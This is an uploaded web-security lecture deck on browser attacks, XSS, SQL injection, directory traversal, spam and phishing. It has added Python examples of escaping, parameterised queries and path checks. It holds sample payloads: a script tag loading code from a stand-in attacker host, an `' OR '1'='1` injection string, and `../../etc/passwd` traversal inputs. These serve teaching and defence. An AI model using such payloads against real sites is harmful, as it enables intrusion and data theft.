Web Security - PPT

Uploaded by praneeth.gunti

Web Software Security

Browser Vulnerabilities
• Security issues for browsers arise from several complications to the simple picture of a browser fetching one page from one address, such as these:
• A browser often connects to more than the one address shown in the browser’s address bar.
• Fetching data can entail accesses to numerous locations to obtain pictures, audio content, and other linked content.
• Browser software can be malicious or can be corrupted to acquire malicious functionality.
• Popular browsers support add-ins, extra code to add new features to the browser, but these add-ins themselves can include corrupting code.
Browser Attack Types

• Man-in-the-browser
• Keystroke logger
• Page-in-the-middle
• Program download substitution
• User-in-the-middle

Man-in-the-Browser

Keystroke Logger
• Hardware or software that records all keystrokes
• May be a small dongle plugged into a USB port or can masquerade as a keyboard
• May also be installed as malware
• Not limited to browsers

Page-in-the-Middle
• User is directed to a different page than believed or intended
• Similar effect to a man-in-the-browser, where the attacker can intercept and modify user input
Program Download Substitution
• Attacker creates a page with seemingly innocuous and desirable programs for download
• Instead of, or in addition to, the intended functionality, the user installs malware
• This is a very common technique for spyware
User-in-the-Middle
• Using click-bait to trick users into solving CAPTCHAs on spammers’ behalf
Successful Authentication
• The attacks listed above are largely failures of authentication
• Can be mitigated with
– Shared secret
– One-time password
– Out-of-band communication
Fake Website
Fake Code
Tracking Bug
Clickjacking
Drive-By Download
• Code is downloaded, installed, and executed on a computer without the user’s knowledge
• May be the result of clickjacking, fake code, program download substitution, etc.
Cross-Site Scripting (XSS)
• Tricking a client or server into executing scripted code by including the code in data inputs
• Scripts and HTML tags are encoded as plaintext just like user inputs, so they can take over web pages similarly to the way buffer overflow attacks can take over programs

Cool<br>story.<br>KCTVBigFan<script src=http://badsite.com/xss.js></script>
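The slide's payload only works because the site echoes the visitor's text back into its HTML unchanged. The following Python is an added example, not part of the slide deck: it renders a constructed comment modelled on the payload twice, once by plain concatenation and once with body-context HTML encoding, and includes a small attribute-context renderer to show that quoting matters there too. The host name badsite.example is a placeholder.

```python
"""Added example (not from the slides): why XSS works and how output
encoding stops it. All sample data is constructed; badsite.example is a
placeholder host."""
from html import escape

# Constructed comment modelled on the slide's payload. The "data" a visitor
# submits is itself HTML, so a page that echoes it verbatim hands the
# browser a <script> element to execute.
MALICIOUS_COMMENT = (
    "Cool<br>story.<br>KCTVBigFan"
    "<script src=http://badsite.example/xss.js></script>"
)


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: user-controlled text is concatenated straight into HTML."""
    return f'<div class="comment">{comment}</div>'


def render_comment_safe(comment: str) -> str:
    """Hardened: encode the HTML metacharacters (< > & " ') for the
    element-body context, so the browser shows the payload as literal text."""
    return f'<div class="comment">{escape(comment, quote=True)}</div>'


def render_attribute_safe(title: str) -> str:
    """Attribute context: quote=True is what matters here, because a bare "
    would otherwise close the attribute and let the rest of the input be
    parsed as further attributes or tags."""
    return f'<a title="{escape(title, quote=True)}">link</a>'


def count_script_elements(html: str) -> int:
    """Review helper: how many <script ...> opening tags survived rendering.
    A safe renderer gives zero for any input."""
    return html.lower().count("<script")


if __name__ == "__main__":
    for name, renderer in (("unsafe", render_comment_unsafe),
                           ("safe", render_comment_safe)):
        out = renderer(MALICIOUS_COMMENT)
        print(f"{name}: {count_script_elements(out)} script element(s)")
        print("  " + out)
```

The design point is that encoding is chosen per output context: `escape` is correct for element bodies and quoted attribute values, but a value placed inside a URL, a JavaScript string or a CSS property needs that context's own encoding, which is why "filter the input" alone is not a complete defence.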
SQL Injection
• Injecting SQL code into an exchange between an application and its database server
• Example:
– Loading an SQL query into a variable, taking the value of acctNum from an arbitrary user input field:
– QUERY = "SELECT * FROM trans WHERE acct = '" + acctNum + "';"
– The same query with malicious user input:
– QUERY = "SELECT * FROM trans WHERE acct = '2468' OR '1'='1';"
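To make the slide's two query strings concrete, here is an added Python example (not from the deck) that builds the `trans` table in an in-memory SQLite database with three constructed rows and runs the account lookup both ways: concatenated exactly as on the slide, and with a bound parameter, which is the equivalent of the stored-procedure control the countermeasures slide recommends.

```python
"""Added example (not from the slides): the slide's account-lookup query,
run against an in-memory SQLite table, concatenated versus parameterised.
All table rows are constructed sample data."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create the 'trans' table from the slide with three constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE trans (id INTEGER PRIMARY KEY, acct TEXT, amount REAL)"
    )
    conn.executemany(
        "INSERT INTO trans (acct, amount) VALUES (?, ?)",
        [("1234", 10.0), ("2468", 25.5), ("9999", 300.0)],
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, acct_num: str) -> list:
    """Vulnerable: the slide's construction. A quote inside acct_num ends the
    string literal, so the rest of the input is parsed as SQL and the WHERE
    clause can be rewritten by whoever fills in the field."""
    query = "SELECT * FROM trans WHERE acct = '" + acct_num + "';"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, acct_num: str) -> list:
    """Hardened: a bound parameter. The driver passes the value separately
    from the statement text, so the input is only ever compared as data."""
    return conn.execute(
        "SELECT * FROM trans WHERE acct = ?;", (acct_num,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    benign, hostile = "2468", "2468' OR '1'='1"
    print("unsafe, benign input :", lookup_unsafe(db, benign))
    print("unsafe, hostile input:", lookup_unsafe(db, hostile))  # every row
    print("safe, hostile input  :", lookup_safe(db, hostile))    # no match
```

With the hostile input the concatenated query returns all three rows, because `'1'='1'` is true for every row; the parameterised query looks for an account literally named `2468' OR '1'='1` and finds nothing.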
Dot-Dot-Slash
• Also known as “directory traversal,” this is when attackers use the term “../” to access files that are on the target web server but not meant to be accessed from outside
• Most commonly entered into the URL bar but may also be combined with other attacks, such as XSS
Server-Side Include (SSI)
• SSI is an interpreted server-side scripting language that can be used for basic web server directives, such as including files and executing commands
• As is the case with XSS, some websites are vulnerable to allowing users to execute SSI directives through text input
Countermeasures to Injections
• Filter and sanitize all user input
– Need to account for every potentially valid encoding
• Make no assumptions about the range of possible user inputs—trust nothing, check everything
• Use access control mechanisms on backend servers, such as “stored procedures”
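The dot-dot-slash slide and the first countermeasure above (account for every encoding) are two sides of one check, so here is a single added Python example, not from the deck, that serves both: it percent-decodes a requested path until it stops changing, folds backslashes, normalises the result under an assumed document root, and refuses anything that lands outside it. WEB_ROOT is a placeholder and all request strings are constructed.

```python
"""Added example (not from the slides): canonicalise a requested path and
refuse anything that escapes the document root. WEB_ROOT is an assumed
placeholder; the request strings in __main__ are constructed."""
import posixpath
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"  # assumed document root (placeholder)


def canonicalize(user_path: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, so that %2e%2e%2f and
    the double-encoded %252e%252e%252f are both seen as '../'. Backslashes
    are folded to '/' because some servers accept either separator."""
    current = user_path
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    else:
        # Still changing after max_rounds: treat excessive nesting as hostile.
        raise ValueError("too many encoding layers")
    return current.replace("\\", "/")


def resolve_under_root(user_path: str, root: str = WEB_ROOT) -> Optional[str]:
    """Return the absolute path to serve, or None if the request must be
    refused. The containment test runs on the normalised path, not on the
    raw string, so '..' is caught however it was spelled."""
    try:
        decoded = canonicalize(user_path)
    except ValueError:
        return None
    if "\0" in decoded:  # a NUL byte would truncate the path in a C-based server
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for req in ("index.html", "img/../logo.png", "../../etc/passwd",
                "%2e%2e%2f%2e%2e%2fetc%2fpasswd",
                "%252e%252e%252fetc%252fpasswd", "..\\..\\..\\etc\\passwd"):
        print(f"{req!r:40} -> {resolve_under_root(req)}")
```

The check deliberately does not look for the literal string `../` in the input; a blacklist of spellings is exactly what the "every potentially valid encoding" point warns against. Normalising first and then testing the prefix means a `..` that only appears after decoding is handled the same way as a plain one.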
Email Spam
• Experts estimate that 60% to 90% of all email is spam
• Types of spam:
– Advertising
• Pharmaceuticals
• Stocks
– Malicious code
– Links for malicious websites
• Spam countermeasures
– Laws against spam exist but are generally ineffective
– Email filters have become very effective for most spam
– Internet service providers use volume limitations to make spammers’ jobs more difficult
Phishing
• A message that tries to trick a victim into providing private information or taking some other unsafe action
• Spear phishing: A targeted attack that is personalized to a particular recipient or set of recipients
Countermeasures
• User education
– Limited effectiveness and very subject to co-evolution with attacks
• PGP and S/MIME
– Cryptographic solutions that have seen very limited adoption after years on the market
Summary
• As web browsers have become a primary focus of users and taken on greater functionality, they’ve become a focus of many types of attack
• Browser and website weaknesses are often the result of some form of poor authentication
• Many attackers focus on tricking users with fake websites, misleading applications, and phishing emails
• On the server side, injection attacks are a key concern, and countermeasures to prevent them are critical
